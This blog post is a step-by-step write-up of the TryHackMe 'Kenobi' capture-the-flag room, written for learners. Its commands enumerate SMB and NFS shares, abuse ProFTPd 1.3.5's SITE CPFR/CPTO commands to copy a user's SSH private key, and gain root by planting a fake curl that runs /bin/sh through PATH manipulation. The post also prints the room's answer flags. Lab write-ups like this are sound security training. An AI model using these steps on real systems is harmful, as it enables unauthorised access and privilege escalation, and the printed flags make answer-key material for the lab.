KenoBi WriteUp “Try Hack Me”

os
3 min readJan 14, 2023

--

https://tryhackme.com/room/kenobi

Q1>
nmap -sT 10.10.103.23 -p-
Open Ports :
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
33813/tcp open unknown
37651/tcp open unknown
40133/tcp open unknown
54859/tcp open unknown

Answer is 7, as the last 4 ports are unknow service.

Enumerating for samba shares

Q1>
possible commands :
enum4linux
nmap -p 445 — script=smb-enum-shares.nse,smb-enum-users.nse 10.10.103.23

3 shares found :
Sharename Type Comment
— — — — — — — — — — -
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))

Q2>
smbclient //10.10.103.23/Anonymous
apparently no root password required here

filename = log.txt
download via get command or use
smbget -R smb://<ip>/anonymous

Q3>
21

Q4>
Port 111(rpcbind) : Allow user on one pc to request services from other computer as long as they are connected to same network. As we are on the same network as the target, it is ready to serve us.

to enumerate :
nmap -p 111 — script=nfs-ls,nfs-statfs,nfs-showmount 10.10.103.23

Mount : /var

Gain initial access with ProFtpd

Q1>
connect to proftpd,
nc 10.10.103.23 21
version = 1.3.5

Q2>
searchsploit ProFTPd 1.3.5
number of exploilts : 4

link to exploit-db: ProFTPd 1.3.5 — File Copy — Linux remote Exploit (exploit-db.com)

Q3>
log.txt told us about the location of kenobi private keys.
SITE CPFR /home/kenobi/.ssh/id_rsa
copy it to var as we see, that is the library shared on the network.
SITE CPTO /var/temp_id-rsa

It was found with the nmap scan that, /var can be mounted.

Create a sub-directory in mount folder
mkdir /mnt/kenobiNFS

Mount the directoru
mount 10.10.102.233:/var /mnt/kenobiNFS

#mount machine_ip:/moountees_path /mounters_path
copy the file in your home directory.

Q4>
user.txt = d0b0f3f53b6caa532a83915e19224899

Privilage escalation Via path bariable manipulation

Q1>
find / -perm -u=s -type f 2>/dev/null

suspecious file: /usr/bin/menu
#this file is not generally located in the /usr/bin

Q2>
run the binary: /usr/bin/menu
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
answer : 3

Q4> run strings command
strings /usr/bin/menu
we see it uses the curl binary
so we make a malicious curl binary in /tmp directory
and store path to shell inside it. As it is running wit root privilages it will launch our root shell.

$ echo /bin/sh > curl
$ chmod 777 curl
$ export PATH=/tmp:$PATH
$ # we prepend tmp to path so that, when the binary runs it looks for $ the resources in tmp, and as it used curl it will launch root shell.

root flag = 177b3cd8562289f37382721c28381f02

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

os
os

No responses yet

Write a response